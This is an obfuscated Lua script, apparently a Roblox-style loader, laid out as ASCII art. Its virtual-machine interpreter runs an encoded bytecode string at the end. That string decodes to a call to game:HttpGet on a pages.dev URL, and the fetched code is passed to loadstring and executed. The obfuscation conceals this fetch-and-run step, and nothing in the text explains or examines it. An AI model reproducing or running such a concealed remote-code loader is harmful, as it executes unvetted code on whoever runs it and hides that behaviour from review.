                                                                                 local v0=tonumber;    
                                                                        local v1=string.byte;local v2=string.char;local 
                                                                     v3=string.sub;local v4=string.gsub;local v5=string.rep;local 
                                                                 v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=    
                                                            getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall 
                                                          ;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local      
                                                        function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)   
                                                      if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v88=0;local v89;while    
                                                    true do if (v88==0) then v89=v2(v0(v30,16));if v19 then local v120=v5(v89,v19);v19=nil;return 
                                                   v120;else return v89;end break;end end end end);local function v20(v31,v32,v33) if v33 then      
                                                  local v90=0 -(1637 -(1523 + 114)) ;local v91;while true do if (v90==(0 -0)) then v91=(v31/(2^(v32-1 
                                                )))%((3 -1)^(((v33-(2 -(1 + 0))) -(v32-((883 -263) -(555 + 64)))) + (932 -(857 + 74)))) ;return v91-(   
                                                v91%(569 -(367 + 201))) ;end end else local v92=927 -(214 + 713) ;local v93;while true do if (v92==(1065  
                                              -(68 + 997))) then v93=2^(v32-((1271 -(226 + 1044)) + (0 -0))) ;return (((v31%(v93 + v93))>=v93) and (1 + 0)) 
                                               or (877 -(282 + 595)) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return    
                                            v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (119 -(32 + 85)) );v18=v18 + 2 ;return (v36 * (251 +  
                                            5)) + v35 ;end local function v23() local v37=(180 -(67 + 113)) + 0 ;local v38;local v39;local v40;local v41;while  
                                          true do if (v37==(957 -(892 + 65))) then v38,v39,v40,v41=v1(v16,v18,v18 + (7 -4) );v18=v18 + (6 -2) ;v37=1 -0 ;end if ( 
                                          v37==1) then return (v41 * (16777566 -(87 + 263))) + (v40 * 65536) + (v39 * 256) + v38 ;end end end local function v24()  
                                          local v42=v23();local v43=v23();local v44=1;local v45=(v20(v43,1,15 + 5 ) * (((795 -(368 + 423)) -2)^(24 + 8))) + v42 ;     
                                          local v46=v20(v43,83 -62 ,983 -(802 + 150) );local v47=((v20(v43,85 -53 )==(1 -0)) and  -1) or ((3 -2) + 0) ;if (v46==(997  
                                        -(915 + 82))) then if (v45==(0 -0)) then return v47 * (0 + 0) ;else v46=(19 -(10 + 8)) -0 ;v44=(4566 -3379) -(1069 + 118) ;end  
                                        elseif (v46==(4643 -2596)) then return ((v45==0) and (v47 * ((1 -0)/( --[[==============================]](442 -(416 + 26)) + 0)) 
                                        )) or (v47 * NaN) ;end return v8(v47,v46-(1817 -794) ) * (  --[[============================================]]v44 + (v45/((2 + 0) 
                                        ^(165 -113)))) ;end local function v25(v48) local v49;  --[[======================================================]]if  not v48     
                                      then local v94=0;while true do if (v94==(0 + 0)) then --[[==========================================================]] v48=v23();if (   
                                      v48==(0 -0)) then return "";end break;end end end   --[[==============================================================]]v49=v3(v16,v18, 
                                      (v18 + v48) -((869 -(44 + 386)) -(145 + 293)) );v18 --[[================================================================]]=v18 + v48 ;    
                                      local v50={};for v66=1, #v49 do v50[v66]=v2(v1(v3(  --[[==================================================================]]v49,v66,v66)) 
                                      );end return v6(v50);end local v26=v23;local        --[[==================================================================]]function v27(     
                                    ...) return {...},v12("#",...);end local function v28 --[[====================================================================]]() local v51= 
                    (function() return function(v95,v96,v97,v98,v99,v100,v101,v102,v103)  --[[====================================================================]]local v104=(    
              function() return 0 -0 ;end)();local v95=(function() return;end)();local    --[[======================================================================]]v96=(function 
            () return;end)();while true do local v113=(function() return 0 + 0 ;end)();   --[[======================================================================]]while true do 
           if (v113==(0 + 0)) then if (v104==(1 + 0)) then local v122=(function() return  --[[======================================================================]]0;end)();     
        while true do if (v122~=(836 -(660 + 176))) then else while true do if (v95~=(0 + --[[======================================================================]] 0)) then     
        else v96=(function() return v97();end)();if (v98(v96, #"!", #"]")==0) then local  --[[======================================================================]]v174=(        
      function() return 0;end)();local v175=(function() return;end)();local v176=(        --[[======================================================================]]function()    
      return;end)();local v177=(function() return;end)();while true do if (v174==0) then    --[[==================================================================]]local v178=(    
      function() return 0;end)();while true do if (v178==0) then v175=(function() return    --[[================================================================]]v98(v96,204 -(14  
    + 188) , #"91(");end)();v176=(function() return v98(v96, #"xnxx",6);end)();v178=(       --[[==============================================================]]function() return 
     1;end)();end if (v178==1) then v174=(function() return 676 -(534 + 141) ;end)();break;   --[[==========================================================]]end end end if (1~= 
    v174) then else local v179=(function() return 0;end)();local v180=(function() return;end)() --[[====================================================]];while true do if (v179 
    ==(0 + 0)) then v180=(function() return 0 + 0 ;end)();while true do if (v180~=(1 + 0)) then   --[[==============================================]]else v174=(function()     
    return 3 -1 ;end)();break;end if (v180==0) then local v185=(function() return 0;end)();while true --[[====================================]] do if (v185==(0 -0)) then    
    v177=(function() return {v99(),v99(),nil,nil};end)();if (v175==(0 + 0)) then local v186=(function()   --[[========================]]return 0 + 0 ;end)();local v187=(     
    function() return;end)();while true do if (v186~=0) then else v187=(function() return 0;end)();while true do if ((396 -(115 + 281))~=v187) then else v177[ #"gha"]=(    
  function() return v99();end)();v177[ #"?id="]=(function() return v99();end)();break;end end break;end end elseif (v175== #"!") then v177[ #"asd"]=(function() return    
  v100();end)();elseif (v175==(4 -2)) then v177[ #"xnx"]=(function() return v100() -(2^(14 + 2)) ;end)();elseif (v175== #"nil") then local v192=(function() return 0 -0 
   ;end)();local v193=(function() return;end)();while true do if ((0 -0)==v192) then v193=(function() return 867 -(550 + 317) ;end)();while true do if (v193==(0 -0))     
  then v177[ #"91("]=(function() return v100() -(2^(22 -6)) ;end)();v177[ #"0313"]=(function() return v99();end)();break;end end break;end end end v185=(function()       
  return 1;end)();end if ((2 -1)==v185) then v180=(function() return 1;end)();break;end end end end break;end end end if (v174~=3) then else if (v98(v176, #"asd", #"-19" 
  )== #"{") then v177[ #"asd1"]=(function() return v101[v177[ #".dev"]];end)();end v102[v103]=(function() return v177;end)();break;end if ((287 -(134 + 151))~=v174) then 
   else if (v98(v176, #">", #"]")~= #"\\") then else v177[1667 -(970 + 695) ]=(function() return v101[v177[3 -1 ]];end)();end if (v98(v176,1992 -(582 + 1408) ,6 -4 )== # 
  ",") then v177[ #"91("]=(function() return v101[v177[ #"xnx"]];end)();end v174=(function() return 3;end)();end end end break;end end return v95,v96,v97,v98,v99,v100,   
  v101,v102,v103;end end end if (v104==0) then local v123=(function() return 0 -0 ;end)();local v124=(function() return;end)();while true do if (v123==0) then v124=(     
  function() return 0;end)();while true do if (v124~=1) then else v104=(function() return 1;end)();break;end if (v124==0) then v95=(function() return 0;end)();v96=(      
  function() return nil;end)();v124=(function() return 3 -2 ;end)();end end break;end end end break;end end end end;end)();local v52=(function() return function(v105,    
  v106,v107) local v108=(function() return 1824 -(1195 + 629) ;end)();local v109=(function() return;end)();while true do if (v108==(0 -0)) then v109=(function() return 0;  
  end)();while true do if (v109~=(241 -(187 + 54))) then else local v125=(function() return 0;end)();while true do if ((780 -(162 + 618))==v125) then v105[v106-#"{" ]=(    
  function() return v107();end)();return v105,v106,v107;end end end end break;end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end 
  )();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return { 
  };end)();for v68= #"[",v57 do local v69=(function() return 0 + 0 ;end)();local v70=(function() return;end)();local v71=(function() return;end)();while true do if (v69==( 
  0 -0)) then local v114=(function() return 0 -0 ;end)();while true do if (v114==0) then local v121=(function() return 0 + 0 ;end)();while true do if (v121~=(1637 -(1373 + 
   263))) then else v114=(function() return 1001 -(451 + 549) ;end)();break;end if (v121~=(0 + 0)) then else v70=(function() return v21();end)();v71=(function() return nil 
  ;end)();v121=(function() return 1 -0 ;end)();end end end if (v114==1) then v69=(function() return 1 -0 ;end)();break;end end end if (v69~=(1385 -(746 + 638))) then else  
  if (v70== #"!") then v71=(function() return v21()~=0 ;end)();elseif (v70==(1 + 1)) then v71=(function() return v24();end)();elseif (v70== #"91(") then v71=(function()    
  return v25();end)();end v58[v68]=(function() return v71;end)();break;end end end v56[ #"91("]=(function() return v21();end)();for v72= #",",v23() do FlatIdent_8199B,     
  Descriptor,v21,v20,v22,v23,v58,v53,v72=(function() return v51(FlatIdent_8199B,Descriptor,v21,v20,v22,v23,v58,v53,v72);end)();end for v73= #"|",v23() do v54,v73,v28=(     
  function() return v52(v54,v73,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[1 -(1212 -(323 + 889)) ];local v64=v60[343 -(218 + 123) ];     
  local v65=v60[3];return function(...) local v74=v63;local v75=v64;local v76=v65;local v77=v27;local v78=1582 -(1535 + 46) ;local v79= -((2 -1) + 0);local v80={};local    
  v81={...};local v82=v12("#",...) -(561 -((886 -(361 + 219)) + 254)) ;local v83={};local v84={};for v110=0 + 0 ,v82 do if ((3629>=1417) and (v110>=v76)) then v80[v110-  
  v76 ]=v81[v110 + (1 -0) ];else v84[v110]=v81[v110 + ((1788 -(53 + 267)) -(204 + 695 + 568)) ];end end local v85=(v82-v76) + 1 + 0 ;local v86;local v87;while true do    
  v86=v74[v78];v87=v86[2 -1 ];if ((4795>402) and (v87<=7)) then if ((4813>3565) and (v87<=(606 -((681 -(15 + 398)) + 335)))) then if (v87<=1) then if ((3912==3912) and ( 
    v87==0)) then do return;end else v84[v86[292 -((1042 -(18 + 964)) + 230) ]]=v62[v86[(2164 -1589) -(426 + 146) ]];end elseif (v87>2) then local v128=v86[1 + 1 ];v84[  
    v128]=v84[v128](v13(v84,v128 + (1457 -(282 + 1174)) ,v79));else local v130=v86[2];v84[v130]=v84[v130](v13(v84,v130 + (812 -(569 + 242)) ,v79));end elseif (v87<=(14 - 
    9)) then if (v87>(1 + 3)) then local v132=1024 -(706 + 318) ;local v133;local v134;local v135;local v136;while true do if (v132==(1253 -(418 + 303 + 530))) then for  
    v169=v133,v79 do v136=v136 + (1272 -(596 + 349 + 326)) ;v84[v169]=v134[v136];end break;end if ((2821<=4824) and (v132==(0 -0))) then v133=v86[2 + 0 ];v134,v135=v77(  
      v84[v133](v13(v84,v133 + (701 -(271 + 429)) ,v86[3 + 0 ])));v132=1501 -(1408 + (942 -(20 + 830))) ;end if (v132==(1087 -(461 + 625))) then v79=(v135 + v133) -(   
      1289 -(993 + 295)) ;v136=0 + 0 ;v132=2;end end else v84[v86[1173 -(418 + 753) ]]={};end elseif (v87>(3 + 3)) then local v138=0 + 0 ;local v139;local v140;while   
      true do if (v138==(0 + 0)) then v139=v86[1 + 1 ];v140=v84[v86[(416 + 116) -(406 + 123) ]];v138=1770 -(1749 + 20) ;end if (v138==(1 + 0)) then v84[v139 + 1 ]=v140 
        ;v84[v139]=v140[v86[1326 -(1249 + 73) ]];break;end end else v84[v86[1 + 1 ]]=v86[3];end elseif (v87<=(1156 -(466 + 679))) then if ((1738<=2195) and (v87<=(21 - 
        12))) then if ((41<=3018) and (v87==(22 -14))) then v84[v86[1902 -(106 + 1794) ]]();else v84[v86[1 + 1 ]]=v86[1 + 2 ];end elseif (v87==10) then v84[v86[128 -(  
        116 + 10) ]]=v62[v86[8 -5 ]];else local v147=v86[5 -3 ];local v148,v149=v77(v84[v147](v13(v84,v147 + (115 -(4 + 110)) ,v86[(44 + 543) -(57 + 527) ])));v79=(    
          v149 + v147) -((2166 -(542 + 196)) -(41 + 1386)) ;local v150=0 -0 ;for v156=v147,v79 do local v157=(31 + 72) -(17 + 44 + 42) ;while true do if ((0 + 0)==   
            v157) then v150=v150 + (1 -0) ;v84[v156]=v148[v150];break;end end end end elseif ((2145<=4104) and (v87<=(37 -24))) then if (v87>(178 -(44 + 78 + 44)))   
              then local v151=0 -0 ;local v152;local v153;while true do if (v151==(3 -2)) then v84[v152 + 1 ]=v153;v84[v152]=v153[v86[4]];break;end if (v151==(0 + 0) 
                ) then v152=v86[1 + 1 ];v153=v84[v86[3]];v151=1 -0 ;end end else v84[v86[(176 -109) -(30 + 35) ]]();end elseif (v87==(10 + 4)) then do return;end     
                  else v84[v86[1259 -(1043 + 214) ]]={};end v78=v78 + ((7 -4) -2) ;end end;end return v29(v28(),{},v17)(...);end return v15(                        
                                                                                                                                                                    
                                                                                                                                                                    
                                                                                                                                                                    
                                                                                                                                                                    
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                
                                                                                                                                                                
                                                                                                                                                                
                                                                                                                                                              
                                                                                                                                                              
                                                                                                                                                            
                                                                                                                                                            
                                                                                                                                                          
                                                                                                                                                      
                                                                                                                                                  
                                                                                                                                          
                                                                                            
                                                                                          
                                                                                        
                                                                                  


"LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403433Q00682Q7470733A2Q2F31333631323033313335342Q322Q36303635302E70616765732E6465762F77686F65766572732Q657468697369736761792F74657374362E6C756100094Q000F7Q00120A000100013Q00120A000200023Q00200D000200020003001206000400044Q0005000200044Q000300013Q00022Q000C0001000100012Q000E3Q00017Q00",v9(),...);